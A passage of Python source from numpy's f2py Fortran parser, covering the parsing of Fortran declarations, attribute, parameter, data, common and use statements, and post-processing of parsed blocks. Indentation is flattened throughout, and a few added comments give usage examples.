# end of crack line => block,name,args,result
needmodule = 0
needinterface = 0
if case in ['call', 'callfun']:
needinterface = 1
if 'args' not in groupcache[groupcounter]:
return
if name not in groupcache[groupcounter]['args']:
return
for it in grouplist[groupcounter]:
if it['name'] == name:
return
if name in groupcache[groupcounter]['interfaced']:
return
block = {'call': 'subroutine', 'callfun': 'function'}[case]
if f77modulename and neededmodule == -1 and groupcounter <= 1:
neededmodule = groupcounter + 2
needmodule = 1
if block != 'interface':
needinterface = 1
# Create new block(s)
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needmodule:
if verbose > 1:
outmess('analyzeline: Creating module block %s\n' %
repr(f77modulename), 0)
groupname[groupcounter] = 'module'
groupcache[groupcounter]['block'] = 'python module'
groupcache[groupcounter]['name'] = f77modulename
groupcache[groupcounter]['from'] = ''
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needinterface:
if verbose > 1:
outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % (
groupcounter), 0)
groupname[groupcounter] = 'interface'
groupcache[groupcounter]['block'] = 'interface'
groupcache[groupcounter]['name'] = 'unknown_interface'
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupname[groupcounter] = block
groupcache[groupcounter]['block'] = block
if not name:
name = 'unknown_' + block
groupcache[groupcounter]['prefix'] = m.group('before')
groupcache[groupcounter]['name'] = rmbadname1(name)
groupcache[groupcounter]['result'] = result
if groupcounter == 1:
groupcache[groupcounter]['from'] = currentfilename
else:
if f77modulename and groupcounter == 3:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], currentfilename)
else:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
for k in list(groupcache[groupcounter].keys()):
if not groupcache[groupcounter][k]:
del groupcache[groupcounter][k]
groupcache[groupcounter]['args'] = args
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['entry'] = {}
# end of creation
if block == 'type':
groupcache[groupcounter]['varnames'] = []
if case in ['call', 'callfun']: # set parents variables
if name not in groupcache[groupcounter - 2]['externals']:
groupcache[groupcounter - 2]['externals'].append(name)
groupcache[groupcounter]['vars'] = copy.deepcopy(
groupcache[groupcounter - 2]['vars'])
try:
del groupcache[groupcounter]['vars'][name][
groupcache[groupcounter]['vars'][name]['attrspec'].index('external')]
except Exception:
pass
if block in ['function', 'subroutine']: # set global attributes
try:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter - 2]['vars'][''])
except Exception:
pass
if case == 'callfun': # return type
if result and result in groupcache[groupcounter]['vars']:
if not name == result:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter]['vars'][result])
# if groupcounter>1: # name is interfaced
try:
groupcache[groupcounter - 2]['interfaced'].append(name)
except Exception:
pass
if block == 'function':
t = typespattern[0].match(m.group('before') + ' ' + name)
if t:
typespec, selector, attr, edecl = cracktypespec0(
t.group('this'), t.group('after'))
updatevars(typespec, selector, attr, edecl)
if case in ['call', 'callfun']:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end routine
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
elif case == 'entry':
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is not None:
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
assert result is None, repr(result)
groupcache[groupcounter]['entry'][name] = args
previous_context = ('entry', name, groupcounter)
elif case == 'type':
typespec, selector, attr, edecl = cracktypespec0(
block, m.group('after'))
last_name = updatevars(typespec, selector, attr, edecl)
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case in ['dimension', 'intent', 'optional', 'required', 'external', 'public', 'private', 'intrinsic']:
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()
i = ll.find('::')
if i < 0 and case == 'intent':
i = markouterparen(ll).find('@)@') - 2
ll = ll[:i + 1] + '::' + ll[i + 1:]
i = ll.find('::')
if ll[i:] == '::' and 'args' in groupcache[groupcounter]:
outmess('All arguments will have attribute %s%s\n' %
(m.group('this'), ll[:i]))
ll = ll + ','.join(groupcache[groupcounter]['args'])
if i < 0:
i = 0
pl = ''
else:
pl = ll[:i].strip()
ll = ll[i + 2:]
ch = markoutercomma(pl).split('@,@')
if len(ch) > 1:
pl = ch[0]
outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % (
','.join(ch[1:])))
last_name = None
for e in [x.strip() for x in markoutercomma(ll).split('@,@')]:
m1 = namepattern.match(e)
if not m1:
if case in ['public', 'private']:
k = ''
else:
print(m.groupdict())
outmess('analyzeline: no name pattern found in %s statement for %s. Skipping.\n' % (
case, repr(e)))
continue
else:
k = rmbadname1(m1.group('name'))
if k not in edecl:
edecl[k] = {}
if case == 'dimension':
ap = case + m1.group('after')
if case == 'intent':
ap = m.group('this') + pl
if _intentcallbackpattern.match(ap):
if k not in groupcache[groupcounter]['args']:
if groupcounter > 1:
if '__user__' not in groupcache[groupcounter - 2]['name']:
outmess(
'analyzeline: missing __user__ module (could be nothing)\n')
# fixes ticket 1693
if k != groupcache[groupcounter]['name']:
outmess('analyzeline: appending intent(callback) %s'
' to %s arguments\n' % (k, groupcache[groupcounter]['name']))
groupcache[groupcounter]['args'].append(k)
else:
errmess(
                                'analyzeline: intent(callback) %s is ignored\n' % (k))
else:
errmess('analyzeline: intent(callback) %s is already'
                                ' in argument list\n' % (k))
if case in ['optional', 'required', 'public', 'external', 'private', 'intrinsic']:
ap = case
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append(ap)
else:
edecl[k]['attrspec'] = [ap]
if case == 'external':
if groupcache[groupcounter]['block'] == 'program':
outmess('analyzeline: ignoring program arguments\n')
continue
if k not in groupcache[groupcounter]['args']:
continue
if 'externals' not in groupcache[groupcounter]:
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['externals'].append(k)
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'parameter':
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()[1:-1]
last_name = None
for e in markoutercomma(ll).split('@,@'):
try:
k, initexpr = [x.strip() for x in e.split('=')]
except Exception:
outmess(
'analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n' % (e, ll))
continue
params = get_parameters(edecl)
k = rmbadname1(k)
if k not in edecl:
edecl[k] = {}
if '=' in edecl[k] and (not edecl[k]['='] == initexpr):
outmess('analyzeline: Overwriting the value of parameter "%s" ("%s") with "%s".\n' % (
k, edecl[k]['='], initexpr))
t = determineexprtype(initexpr, params)
if t:
if t.get('typespec') == 'real':
tt = list(initexpr)
for m in real16pattern.finditer(initexpr):
tt[m.start():m.end()] = list(
initexpr[m.start():m.end()].lower().replace('d', 'e'))
initexpr = ''.join(tt)
elif t.get('typespec') == 'complex':
initexpr = initexpr[1:].lower().replace('d', 'e').\
replace(',', '+1j*(')
try:
v = eval(initexpr, {}, params)
except (SyntaxError, NameError, TypeError) as msg:
errmess('analyzeline: Failed to evaluate %r. Ignoring: %s\n'
% (initexpr, msg))
continue
edecl[k]['='] = repr(v)
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append('parameter')
else:
edecl[k]['attrspec'] = ['parameter']
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'implicit':
if m.group('after').strip().lower() == 'none':
groupcache[groupcounter]['implicit'] = None
elif m.group('after'):
if 'implicit' in groupcache[groupcounter]:
impl = groupcache[groupcounter]['implicit']
else:
impl = {}
if impl is None:
outmess(
'analyzeline: Overwriting earlier "implicit none" statement.\n')
impl = {}
for e in markoutercomma(m.group('after')).split('@,@'):
decl = {}
m1 = re.match(
r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z', e, re.I)
if not m1:
outmess(
'analyzeline: could not extract info of implicit statement part "%s"\n' % (e))
continue
m2 = typespattern4implicit.match(m1.group('this'))
if not m2:
outmess(
'analyzeline: could not extract types pattern of implicit statement part "%s"\n' % (e))
continue
typespec, selector, attr, edecl = cracktypespec0(
m2.group('this'), m2.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
decl['typespec'] = typespec
decl['kindselector'] = kindselect
decl['charselector'] = charselect
decl['typename'] = typename
for k in list(decl.keys()):
if not decl[k]:
del decl[k]
for r in markoutercomma(m1.group('after')).split('@,@'):
if '-' in r:
try:
begc, endc = [x.strip() for x in r.split('-')]
except Exception:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n' % r)
continue
else:
begc = endc = r.strip()
if not len(begc) == len(endc) == 1:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n' % r)
continue
for o in range(ord(begc), ord(endc) + 1):
impl[chr(o)] = decl
groupcache[groupcounter]['implicit'] = impl
elif case == 'data':
ll = []
dl = ''
il = ''
f = 0
fc = 1
inp = 0
for c in m.group('after'):
if not inp:
if c == "'":
fc = not fc
if c == '/' and fc:
f = f + 1
continue
if c == '(':
inp = inp + 1
elif c == ')':
inp = inp - 1
if f == 0:
dl = dl + c
elif f == 1:
il = il + c
elif f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
dl = c
il = ''
f = 0
if f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
vars = {}
if 'vars' in groupcache[groupcounter]:
vars = groupcache[groupcounter]['vars']
last_name = None
for l in ll:
l = [x.strip() for x in l]
if l[0][0] == ',':
l[0] = l[0][1:]
if l[0][0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % l[0])
continue
i = 0
j = 0
llen = len(l[1])
for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]):
if v[0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % v)
# XXX: subsequent init expressions may get wrong values.
# Ignoring since data statements are irrelevant for
# wrapping.
continue
fc = 0
while (i < llen) and (fc or not l[1][i] == ','):
if l[1][i] == "'":
fc = not fc
i = i + 1
i = i + 1
if v not in vars:
vars[v] = {}
if '=' in vars[v] and not vars[v]['='] == l[1][j:i - 1]:
outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n' % (
v, vars[v]['='], l[1][j:i - 1]))
vars[v]['='] = l[1][j:i - 1]
j = i
last_name = v
groupcache[groupcounter]['vars'] = vars
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'common':
line = m.group('after').strip()
if not line[0] == '/':
line = '//' + line
cl = []
f = 0
bn = ''
ol = ''
for c in line:
if c == '/':
f = f + 1
continue
if f >= 3:
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
f = f - 2
bn = ''
ol = ''
if f % 2:
bn = bn + c
else:
ol = ol + c
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
commonkey = {}
if 'common' in groupcache[groupcounter]:
commonkey = groupcache[groupcounter]['common']
for c in cl:
if c[0] not in commonkey:
commonkey[c[0]] = []
for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]:
if i:
commonkey[c[0]].append(i)
groupcache[groupcounter]['common'] = commonkey
previous_context = ('common', bn, groupcounter)
elif case == 'use':
m1 = re.match(
r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z', m.group('after'), re.I)
if m1:
mm = m1.groupdict()
if 'use' not in groupcache[groupcounter]:
groupcache[groupcounter]['use'] = {}
name = m1.group('name')
groupcache[groupcounter]['use'][name] = {}
isonly = 0
if 'list' in mm and mm['list'] is not None:
if 'notonly' in mm and mm['notonly'] is None:
isonly = 1
groupcache[groupcounter]['use'][name]['only'] = isonly
ll = [x.strip() for x in mm['list'].split(',')]
rl = {}
for l in ll:
if '=' in l:
m2 = re.match(
r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z', l, re.I)
if m2:
rl[m2.group('local').strip()] = m2.group(
'use').strip()
else:
outmess(
                                'analyzeline: No local=>use pattern found in %s\n' % repr(l))
else:
rl[l] = l
groupcache[groupcounter]['use'][name]['map'] = rl
else:
pass
else:
print(m.groupdict())
outmess('analyzeline: Could not crack the use statement.\n')
elif case in ['f2pyenhancements']:
if 'f2pyenhancements' not in groupcache[groupcounter]:
groupcache[groupcounter]['f2pyenhancements'] = {}
d = groupcache[groupcounter]['f2pyenhancements']
if m.group('this') == 'usercode' and 'usercode' in d:
if isinstance(d['usercode'], str):
d['usercode'] = [d['usercode']]
d['usercode'].append(m.group('after'))
else:
d[m.group('this')] = m.group('after')
elif case == 'multiline':
if previous_context is None:
if verbose:
outmess('analyzeline: No context for multiline block.\n')
return
gc = groupcounter
appendmultiline(groupcache[gc],
previous_context[:2],
m.group('this'))
else:
if verbose > 1:
print(m.groupdict())
outmess('analyzeline: No code implemented for line.\n')
def appendmultiline(group, context_name, ml):
if 'f2pymultilines' not in group:
group['f2pymultilines'] = {}
d = group['f2pymultilines']
if context_name not in d:
d[context_name] = []
d[context_name].append(ml)
return
def cracktypespec0(typespec, ll):
selector = None
attr = None
if re.match(r'double\s*complex', typespec, re.I):
typespec = 'double complex'
elif re.match(r'double\s*precision', typespec, re.I):
typespec = 'double precision'
else:
typespec = typespec.strip().lower()
m1 = selectpattern.match(markouterparen(ll))
if not m1:
outmess(
'cracktypespec0: no kind/char_selector pattern found for line.\n')
return
d = m1.groupdict()
for k in list(d.keys()):
d[k] = unmarkouterparen(d[k])
if typespec in ['complex', 'integer', 'logical', 'real', 'character', 'type']:
selector = d['this']
ll = d['after']
i = ll.find('::')
if i >= 0:
attr = ll[:i].strip()
ll = ll[i + 2:]
return typespec, selector, attr, ll
#####
namepattern = re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z', re.I)
kindselector = re.compile(
r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z', re.I)
charselector = re.compile(
r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z', re.I)
lenkindpattern = re.compile(
r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z', re.I)
lenarraypattern = re.compile(
r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z', re.I)
def removespaces(expr):
expr = expr.strip()
if len(expr) <= 1:
return expr
expr2 = expr[0]
for i in range(1, len(expr) - 1):
if (expr[i] == ' ' and
((expr[i + 1] in "()[]{}=+-/* ") or
(expr[i - 1] in "()[]{}=+-/* "))):
continue
expr2 = expr2 + expr[i]
expr2 = expr2 + expr[-1]
return expr2
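# Editor's illustration (not part of the original f2py sources): spaces are
# dropped only next to operators and brackets, so keywords stay separated,
# e.g.
#   removespaces('a + b')   -> 'a+b'
#   removespaces('real x')  -> 'real x'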
def markinnerspaces(line):
l = ''
f = 0
cc = '\''
cb = ''
for c in line:
if cb == '\\' and c in ['\\', '\'', '"']:
l = l + c
cb = c
continue
if f == 0 and c in ['\'', '"']:
cc = c
        if c == cc:
            # toggle the in-string flag (the original `f = f + 1` plus a dead
            # `elif c == cc` branch never reset f, leaving every quoted
            # string after the first one unprotected)
            f = 1 - f
elif c == ' ' and f == 1:
l = l + '@_@'
continue
l = l + c
cb = c
return l
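# Editor's illustration (not part of the original f2py sources): spaces
# inside quoted strings are protected as '@_@' so later space-splitting
# leaves string literals intact, e.g.
#   markinnerspaces("a 'b c' d")  -> "a 'b@_@c' d"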
def updatevars(typespec, selector, attrspec, entitydecl):
global groupcache, groupcounter
last_name = None
kindselect, charselect, typename = cracktypespec(typespec, selector)
if attrspec:
attrspec = [x.strip() for x in markoutercomma(attrspec).split('@,@')]
l = []
c = re.compile(r'(?P<start>[a-zA-Z]+)')
for a in attrspec:
if not a:
continue
m = c.match(a)
if m:
s = m.group('start').lower()
a = s + a[len(s):]
l.append(a)
attrspec = l
el = [x.strip() for x in markoutercomma(entitydecl).split('@,@')]
el1 = []
for e in el:
for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)), comma=' ').split('@ @')]:
if e1:
el1.append(e1.replace('@_@', ' '))
for e in el1:
m = namepattern.match(e)
if not m:
outmess(
'updatevars: no name pattern found for entity=%s. Skipping.\n' % (repr(e)))
continue
ename = rmbadname1(m.group('name'))
edecl = {}
if ename in groupcache[groupcounter]['vars']:
edecl = groupcache[groupcounter]['vars'][ename].copy()
not_has_typespec = 'typespec' not in edecl
if not_has_typespec:
edecl['typespec'] = typespec
elif typespec and (not typespec == edecl['typespec']):
outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typespec'], typespec))
if 'kindselector' not in edecl:
edecl['kindselector'] = copy.copy(kindselect)
elif kindselect:
for k in list(kindselect.keys()):
if k in edecl['kindselector'] and (not kindselect[k] == edecl['kindselector'][k]):
outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['kindselector'][k], kindselect[k]))
else:
edecl['kindselector'][k] = copy.copy(kindselect[k])
if 'charselector' not in edecl and charselect:
if not_has_typespec:
edecl['charselector'] = charselect
else:
errmess('updatevars:%s: attempt to change empty charselector to %r. Ignoring.\n'
% (ename, charselect))
elif charselect:
for k in list(charselect.keys()):
if k in edecl['charselector'] and (not charselect[k] == edecl['charselector'][k]):
outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['charselector'][k], charselect[k]))
else:
edecl['charselector'][k] = copy.copy(charselect[k])
if 'typename' not in edecl:
edecl['typename'] = typename
elif typename and (not edecl['typename'] == typename):
outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typename'], typename))
if 'attrspec' not in edecl:
edecl['attrspec'] = copy.copy(attrspec)
elif attrspec:
for a in attrspec:
if a not in edecl['attrspec']:
edecl['attrspec'].append(a)
else:
edecl['typespec'] = copy.copy(typespec)
edecl['kindselector'] = copy.copy(kindselect)
edecl['charselector'] = copy.copy(charselect)
edecl['typename'] = typename
edecl['attrspec'] = copy.copy(attrspec)
if m.group('after'):
m1 = lenarraypattern.match(markouterparen(m.group('after')))
if m1:
d1 = m1.groupdict()
for lk in ['len', 'array', 'init']:
if d1[lk + '2'] is not None:
d1[lk] = d1[lk + '2']
del d1[lk + '2']
for k in list(d1.keys()):
if d1[k] is not None:
d1[k] = unmarkouterparen(d1[k])
else:
del d1[k]
if 'len' in d1 and 'array' in d1:
if d1['len'] == '':
d1['len'] = d1['array']
del d1['array']
else:
d1['array'] = d1['array'] + ',' + d1['len']
del d1['len']
errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n' % (
typespec, e, typespec, ename, d1['array']))
if 'array' in d1:
dm = 'dimension(%s)' % d1['array']
if 'attrspec' not in edecl or (not edecl['attrspec']):
edecl['attrspec'] = [dm]
else:
edecl['attrspec'].append(dm)
for dm1 in edecl['attrspec']:
if dm1[:9] == 'dimension' and dm1 != dm:
del edecl['attrspec'][-1]
errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n'
% (ename, dm1, dm))
break
if 'len' in d1:
if typespec in ['complex', 'integer', 'logical', 'real']:
if ('kindselector' not in edecl) or (not edecl['kindselector']):
edecl['kindselector'] = {}
edecl['kindselector']['*'] = d1['len']
elif typespec == 'character':
if ('charselector' not in edecl) or (not edecl['charselector']):
edecl['charselector'] = {}
if 'len' in edecl['charselector']:
del edecl['charselector']['len']
edecl['charselector']['*'] = d1['len']
if 'init' in d1:
if '=' in edecl and (not edecl['='] == d1['init']):
outmess('updatevars: attempt to change the init expression of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['='], d1['init']))
else:
edecl['='] = d1['init']
else:
outmess('updatevars: could not crack entity declaration "%s". Ignoring.\n' % (
ename + m.group('after')))
for k in list(edecl.keys()):
if not edecl[k]:
del edecl[k]
groupcache[groupcounter]['vars'][ename] = edecl
if 'varnames' in groupcache[groupcounter]:
groupcache[groupcounter]['varnames'].append(ename)
last_name = ename
return last_name
def cracktypespec(typespec, selector):
kindselect = None
charselect = None
typename = None
if selector:
if typespec in ['complex', 'integer', 'logical', 'real']:
kindselect = kindselector.match(selector)
if not kindselect:
outmess(
'cracktypespec: no kindselector pattern found for %s\n' % (repr(selector)))
return
kindselect = kindselect.groupdict()
kindselect['*'] = kindselect['kind2']
del kindselect['kind2']
for k in list(kindselect.keys()):
if not kindselect[k]:
del kindselect[k]
for k, i in list(kindselect.items()):
kindselect[k] = rmbadname1(i)
elif typespec == 'character':
charselect = charselector.match(selector)
if not charselect:
outmess(
'cracktypespec: no charselector pattern found for %s\n' % (repr(selector)))
return
charselect = charselect.groupdict()
charselect['*'] = charselect['charlen']
del charselect['charlen']
if charselect['lenkind']:
lenkind = lenkindpattern.match(
markoutercomma(charselect['lenkind']))
lenkind = lenkind.groupdict()
for lk in ['len', 'kind']:
if lenkind[lk + '2']:
lenkind[lk] = lenkind[lk + '2']
charselect[lk] = lenkind[lk]
del lenkind[lk + '2']
del charselect['lenkind']
for k in list(charselect.keys()):
if not charselect[k]:
del charselect[k]
for k, i in list(charselect.items()):
charselect[k] = rmbadname1(i)
elif typespec == 'type':
typename = re.match(r'\s*\(\s*(?P<name>\w+)\s*\)', selector, re.I)
if typename:
typename = typename.group('name')
else:
outmess('cracktypespec: no typename found in %s\n' %
(repr(typespec + selector)))
else:
outmess('cracktypespec: no selector used for %s\n' %
(repr(selector)))
return kindselect, charselect, typename
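# Editor's illustration (not part of the original f2py sources): the selector
# string is cracked into the kind/char dictionaries described in the module
# docstring, e.g.
#   cracktypespec('real', '*8')             -> ({'*': '8'}, None, None)
#   cracktypespec('character', '(len=10)')  -> (None, {'len': '10'}, None)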
######
def setattrspec(decl, attr, force=0):
if not decl:
decl = {}
if not attr:
return decl
if 'attrspec' not in decl:
decl['attrspec'] = [attr]
return decl
if force:
decl['attrspec'].append(attr)
if attr in decl['attrspec']:
return decl
if attr == 'static' and 'automatic' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'automatic' and 'static' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'public':
if 'private' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'private':
if 'public' not in decl['attrspec']:
decl['attrspec'].append(attr)
else:
decl['attrspec'].append(attr)
return decl
def setkindselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'kindselector' not in decl:
decl['kindselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['kindselector']:
decl['kindselector'][k] = sel[k]
return decl
def setcharselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'charselector' not in decl:
decl['charselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['charselector']:
decl['charselector'][k] = sel[k]
return decl
def getblockname(block, unknown='unknown'):
if 'name' in block:
return block['name']
return unknown
# post processing
def setmesstext(block):
global filepositiontext
try:
filepositiontext = 'In: %s:%s\n' % (block['from'], block['name'])
except Exception:
pass
def get_usedict(block):
usedict = {}
if 'parent_block' in block:
usedict = get_usedict(block['parent_block'])
if 'use' in block:
usedict.update(block['use'])
return usedict
def get_useparameters(block, param_map=None):
global f90modulevars
if param_map is None:
param_map = {}
usedict = get_usedict(block)
if not usedict:
return param_map
for usename, mapping in list(usedict.items()):
usename = usename.lower()
if usename not in f90modulevars:
outmess('get_useparameters: no module %s info used by %s\n' %
(usename, block.get('name')))
continue
mvars = f90modulevars[usename]
params = get_parameters(mvars)
if not params:
continue
# XXX: apply mapping
if mapping:
            errmess('get_useparameters: mapping for %s is not implemented.\n' % (mapping))
for k, v in list(params.items()):
if k in param_map:
outmess('get_useparameters: overriding parameter %s with'
                        ' value from module %s\n' % (repr(k), repr(usename)))
param_map[k] = v
return param_map
def postcrack2(block, tab='', param_map=None):
global f90modulevars
if not f90modulevars:
return block
if isinstance(block, list):
ret = [postcrack2(g, tab=tab + '\t', param_map=param_map)
for g in block]
return ret
setmesstext(block)
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
if param_map is None:
param_map = get_useparameters(block)
if param_map is not None and 'vars' in block:
vars = block['vars']
for n in list(vars.keys()):
var = vars[n]
if 'kindselector' in var:
kind = var['kindselector']
if 'kind' in kind:
val = kind['kind']
if val in param_map:
kind['kind'] = param_map[val]
new_body = [postcrack2(b, tab=tab + '\t', param_map=param_map)
for b in block['body']]
block['body'] = new_body
return block
def postcrack(block, args=None, tab=''):
"""
TODO:
function return values
determine expression types if in argument list
"""
global usermodules, onlyfunctions
if isinstance(block, list):
gret = []
uret = []
for g in block:
setmesstext(g)
g = postcrack(g, tab=tab + '\t')
# sort user routines to appear first
if 'name' in g and '__user__' in g['name']:
uret.append(g)
else:
gret.append(g)
return uret + gret
setmesstext(block)
if not isinstance(block, dict) and 'block' not in block:
raise Exception('postcrack: Expected block dictionary instead of ' +
str(block))
if 'name' in block and not block['name'] == 'unknown_interface':
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
block = analyzeargs(block)
block = analyzecommon(block)
block['vars'] = analyzevars(block)
block['sortvars'] = sortvarnames(block['vars'])
if 'args' in block and block['args']:
args = block['args']
block['body'] = analyzebody(block, args, tab=tab)
userisdefined = []
if 'use' in block:
useblock = block['use']
for k in list(useblock.keys()):
if '__user__' in k:
userisdefined.append(k)
else:
useblock = {}
name = ''
if 'name' in block:
name = block['name']
# and not userisdefined: # Build a __user__ module
if 'externals' in block and block['externals']:
interfaced = []
if 'interfaced' in block:
interfaced = block['interfaced']
mvars = copy.copy(block['vars'])
if name:
mname = name + '__user__routines'
else:
mname = 'unknown__user__routines'
if mname in userisdefined:
i = 1
while '%s_%i' % (mname, i) in userisdefined:
i = i + 1
mname = '%s_%i' % (mname, i)
interface = {'block': 'interface', 'body': [],
'vars': {}, 'name': name + '_user_interface'}
for e in block['externals']:
if e in interfaced:
edef = []
j = -1
for b in block['body']:
j = j + 1
if b['block'] == 'interface':
i = -1
for bb in b['body']:
i = i + 1
if 'name' in bb and bb['name'] == e:
edef = copy.copy(bb)
del b['body'][i]
break
if edef:
if not b['body']:
del block['body'][j]
del interfaced[interfaced.index(e)]
break
interface['body'].append(edef)
else:
if e in mvars and not isexternal(mvars[e]):
interface['vars'][e] = mvars[e]
if interface['vars'] or interface['body']:
block['interfaced'] = interfaced
mblock = {'block': 'python module', 'body': [
interface], 'vars': {}, 'name': mname, 'interfaced': block['externals']}
useblock[mname] = {}
usermodules.append(mblock)
if useblock:
block['use'] = useblock
return block
def sortvarnames(vars):
indep = []
dep = []
for v in list(vars.keys()):
if 'depend' in vars[v] and vars[v]['depend']:
dep.append(v)
else:
indep.append(v)
n = len(dep)
i = 0
while dep: # XXX: How to catch dependence cycles correctly?
v = dep[0]
fl = 0
for w in dep[1:]:
if w in vars[v]['depend']:
fl = 1
break
if fl:
dep = dep[1:] + [v]
i = i + 1
if i > n:
errmess('sortvarnames: failed to compute dependencies because'
' of cyclic dependencies between '
+ ', '.join(dep) + '\n')
indep = indep + dep
break
else:
indep.append(v)
dep = dep[1:]
n = len(dep)
i = 0
return indep
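# Editor's illustration (not part of the original f2py sources): variables
# with a 'depend' list are pushed after the names they depend on, e.g.
#   sortvarnames({'a': {'depend': ['n']}, 'n': {}})  -> ['n', 'a']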
def analyzecommon(block):
if not hascommon(block):
return block
commonvars = []
for k in list(block['common'].keys()):
comvars = []
for e in block['common'][k]:
m = re.match(
r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z', e, re.I)
if m:
dims = []
if m.group('dims'):
dims = [x.strip()
for x in markoutercomma(m.group('dims')).split('@,@')]
n = rmbadname1(m.group('name').strip())
if n in block['vars']:
if 'attrspec' in block['vars'][n]:
block['vars'][n]['attrspec'].append(
'dimension(%s)' % (','.join(dims)))
else:
block['vars'][n]['attrspec'] = [
'dimension(%s)' % (','.join(dims))]
else:
if dims:
block['vars'][n] = {
'attrspec': ['dimension(%s)' % (','.join(dims))]}
else:
block['vars'][n] = {}
if n not in commonvars:
